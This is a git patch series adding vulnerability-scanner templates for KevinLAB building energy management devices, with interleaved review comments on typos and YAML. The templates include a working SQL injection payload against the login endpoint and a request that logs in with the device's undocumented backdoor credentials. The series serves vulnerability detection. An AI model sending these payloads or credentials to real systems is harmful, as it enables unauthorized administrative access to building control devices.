From 89edd83f1d501fc10ea77b2adcc8c76ef022d0ab Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Thu, 22 Jul 2021 20:46:53 +0900
Subject: [PATCH 01/10] Update favicon-detection.yaml
Signed-off-by: GwanYeong Kim
---
 technologies/favicon-detection.yaml | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml
index 1110dbd233..5add1359b3 100644
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@@ -2036,3 +2036,7 @@ requests:
 name: "SpamSniper"
 dsl:
 - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))"
+ - type: dsl
+ name: "KevinLAB"
+ dsl:
+ - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))"
From 1005b0b23b7d356fce5ac069ae63b66edea406e5 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Thu, 22 Jul 2021 20:47:23 +0900
Subject: [PATCH 02/10] Create kevinlab-device-detect.yaml
Signed-off-by: GwanYeong Kim
---
 iot/kevinlab-device-detect.yaml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 iot/kevinlab-device-detect.yaml
diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml
new file mode 100644
index 0000000000..8e28c8b5ba
--- /dev/null
+++ b/iot/kevinlab-device-detect.yaml
@@ -0,0 +1,30 @@
+id: kevinlab-device-detect
+
+info:
+ name: KevinLAB Deviceas Detection
+ description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.
+ author: gy741
+ severity: info
+ tags: iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pages/"
+ - "{{BaseURL}}/dashboard/"
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - 'BEMS'
+ - '../http/index.php'
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - 'HEMS'
+ - '../dashboard/proc.php'
+ part: body
+ condition: and
From a4ec6a2b1117f157e404ab89fb801007286729c0 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Thu, 22 Jul 2021 21:46:18 +0900
Subject: [PATCH 03/10] Create kevinlab-bems-sqli.yaml
The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries.
Signed-off-by: GwanYeong Kim
---
 vulnerabilities/other/kevinlab-bems-sqli.yaml | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 vulnerabilities/other/kevinlab-bems-sqli.yaml
diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml
new file mode 100644
index 0000000000..8d345dfd23
--- /dev/null
+++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml
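Review bot: In the kevinlab-device-detect.yaml hunk (PATCH 02) the description still reads `It improves the efficient of energy use`, which should be `It improves the efficiency of energy use`; the name typo is fixed later in the series by PATCH 06, but this one is not. The `tags: iot` line also omits the vendor tag that the sibling templates in this series carry (`tags: kevinlab,sqli`, `tags: kevinlab`), so `tags: iot,kevinlab` would let the three templates be selected together. Both are one-line edits to the info block.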
@@ -0,0 +1,28 @@
+id: kevinlab-bems-sqli
+
+info:
+ name: KevinLAB BEMS (Building Energy Management System) Unauthenticated SQL Injection
+ author: gy741
+ severity: high
+ description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries.
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
+ tags: kevinlab,sqli
+
+requests:
+ - raw:
+ - |
+ POST /http/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/javascript, */*; q=0.01
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
+
+ matchers:
+ - type: word
+ words:
+ - "XPATH syntax error"
From 69db0862ee688475299805dfeb7fe1907a5b8a7a Mon Sep 17 00:00:00 2001
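Review bot: The request body line in the kevinlab-bems-sqli.yaml hunk (PATCH 03) shows `requester=login&request=login¶ms=...`, where the pilcrow looks like an HTML-entity rendering of `&para` followed by `ms` rather than the `&`-separated third form field the login handler presumably expects; confirm the committed file carries the plain ASCII form, since a literal `¶` would submit a differently named field and the matcher would likely never fire. The same rendering appears in the body line of the kevinlab-bems-backdoor.yaml hunk (PATCH 04) and in its context copies in PATCH 05 and PATCH 08. If it is only an artifact of this page, nothing in the files needs to change.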
From: GwanYeong Kim
Date: Thu, 22 Jul 2021 22:13:00 +0900
Subject: [PATCH 04/10] Create kevinlab-bems-backdoor.yaml
The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
Signed-off-by: GwanYeong Kim
---
 .../other/kevinlab-bems-backdoor.yaml | 36 +++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 vulnerabilities/other/kevinlab-bems-backdoor.yaml
diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
new file mode 100644
index 0000000000..8256687c57
--- /dev/null
+++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
@@ -0,0 +1,36 @@
+id: kevinlab-bems-backdoor
+
+info:
+ name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account
+ author: gy741
+ severity: critical
+ description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
+ tags: kevinlab
+
+requests:
+ - raw:
+ - |
+ POST /http/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/javascript, */*; q=0.01
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Accept-Encoding: gzip, deflate
+ Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+ Connection: close
+
+ requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - 'data":"[A-Za-z0-9-]+'
+ - 'login_key":"[A-Za-z0-9-]+'
+ part: body
+ condition: or
+
+ - type: status
+ status:
+ - 200
From 47ea40bc5513be6e44abe1f71f2fb6b516740c1e Mon Sep 17 00:00:00 2001
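Review bot: The description in the kevinlab-bems-backdoor.yaml hunk (PATCH 04) does not say that running this template performs a real authentication with the account named in the advisory rather than a passive probe, so a positive result also means a privileged login was actually performed on the device; a sentence such as `This template logs in with the undocumented account, so a match means a privileged session was established on the target.` would make that explicit for operators and for anyone reviewing the device's authentication records afterwards. While on that line, `thru the RMI` should spell out the acronym, and `Attacker could exploit` should read `An attacker could exploit`. The description is also a single very long plain scalar; a `description: >-` folded block would keep it within the line limit without changing the value.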
From: sandeep
Date: Sat, 24 Jul 2021 03:17:53 +0530
Subject: [PATCH 05/10] Update kevinlab-bems-backdoor.yaml
---
 vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
index 8256687c57..e2abcec244 100644
--- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
@@ -21,7 +21,7 @@ requests:
 Connection: close
 requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D
-
+
 matchers-condition: and
 matchers:
 - type: regex
From 406dee74e87a15973e5cffe4536df2cbb5411b1c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 24 Jul 2021 11:42:39 +0530
Subject: [PATCH 06/10] Update kevinlab-device-detect.yaml
---
 iot/kevinlab-device-detect.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml
index 8e28c8b5ba..2f33447a4c 100644
--- a/iot/kevinlab-device-detect.yaml
+++ b/iot/kevinlab-device-detect.yaml
@@ -1,7 +1,7 @@
 id: kevinlab-device-detect
 info:
- name: KevinLAB Deviceas Detection
+ name: KevinLAB Devices Detection
 description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.
 author: gy741
 severity: info
From 87b4c2e98b4bdc44837fff077866a5ab86f96ea7 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 24 Jul 2021 11:47:05 +0530
Subject: [PATCH 07/10] Update kevinlab-bems-sqli.yaml
---
 vulnerabilities/other/kevinlab-bems-sqli.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml
index 8d345dfd23..781f8eb9a3 100644
--- a/vulnerabilities/other/kevinlab-bems-sqli.yaml
+++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml
@@ -1,11 +1,14 @@
 id: kevinlab-bems-sqli
 info:
- name: KevinLAB BEMS (Building Energy Management System) Unauthenticated SQL Injection
+ name: KevinLAB BEMS 1.0 Unauthenticated SQL Injection/Authentication Bypass
 author: gy741
 severity: high
 description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries.
- reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
+ reference: |
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
+ - https://www.exploit-db.com/exploits/50146
+ - https://packetstormsecurity.com/files/163572/
 tags: kevinlab,sqli
 requests:
From 9a46592f714d5fed6424931de12da048334e8865 Mon Sep 17 00:00:00 2001
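Review bot: `reference: |` in the kevinlab-bems-sqli.yaml hunk (PATCH 07) turns the three URLs into one literal block string that still contains the `- ` prefixes, so a consumer reads a single value of three dash-prefixed lines rather than three references. If the template loader accepts a sequence for this key, dropping the indicator so the line reads `reference:` makes the three existing `- https://…` lines a proper YAML list; otherwise the dashes should be removed and the URLs kept as a plain multi-line string so the value is at least not misleading. The other hunk on this line (PATCH 06) is a typo fix and needs nothing.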
From: Prince Chaddha
Date: Sat, 24 Jul 2021 11:59:35 +0530
Subject: [PATCH 08/10] Update kevinlab-bems-sqli.yaml
---
 vulnerabilities/other/kevinlab-bems-sqli.yaml | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml
index 781f8eb9a3..e4a4a8fcc4 100644
--- a/vulnerabilities/other/kevinlab-bems-sqli.yaml
+++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml
@@ -25,7 +25,12 @@ requests:
 requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
+ matchers-condition: and
 matchers:
 - type: word
 words:
 - "XPATH syntax error"
+ - ": '\\ZSL1ZSL'"
+ - type: status
+ status:
+ - 200
From 2631f55550f1d7e37d1b89b23d8eecdffb905ba8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 24 Jul 2021 12:07:27 +0530
Subject: [PATCH 09/10] Update kevinlab-bems-backdoor.yaml
---
 vulnerabilities/other/kevinlab-bems-backdoor.yaml | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
index e2abcec244..54619b0ce4 100644
--- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml
@@ -31,6 +31,11 @@ requests:
 part: body
 condition: or
+ - type: word
+ words:
+ - '"result":true'
+ part: body
+
 - type: status
 status:
 - 200
From ac45802ef5fce60fa719eadcaf6fedd30d2307f0 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 24 Jul 2021 12:10:46 +0530
Subject: [PATCH 10/10] Update kevinlab-bems-sqli.yaml
---
 vulnerabilities/other/kevinlab-bems-sqli.yaml | 1 +
 1 file changed, 1 insertion(+)
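Review bot: The word matcher added in the kevinlab-bems-backdoor.yaml hunk (PATCH 09) matches the literal `"result":true`, so a response serialized with whitespace after the colon (`"result": true`) would fail the file's `matchers-condition: and` and the template would silently report nothing. If the device's JSON formatting is not guaranteed, a regex matcher on `"result"\s*:\s*true` (with `part: body`) is more robust than the word matcher; otherwise a comment such as `# exact serialization observed in the advisory response` would record why the literal form is relied on. The first hunk on this line (PATCH 08) is already tightened by PATCH 10's `condition: and` and needs nothing further here.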
diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index e4a4a8fcc4..6d35885dfc 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -31,6 +31,7 @@ requests: words: - "XPATH syntax error" - ": '\\ZSL1ZSL'" + condition: and - type: status status: - 200
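Review bot: With `condition: and` the kevinlab-bems-sqli.yaml matcher now requires the second word, `: '\ZSL1ZSL'` once the double-quoted YAML escape is resolved, and that string is derived from the `0x5C` and `0x5A534C` constants in the request body earlier in the same file, yet nothing in the file records the coupling. A comment above the words list, `# second word is the expected echo of the marker bytes in the request body; change both together`, would stop a later edit of either side from silently breaking the match. The enclosing `requests:` block and the request body it refers to begin outside the hunk.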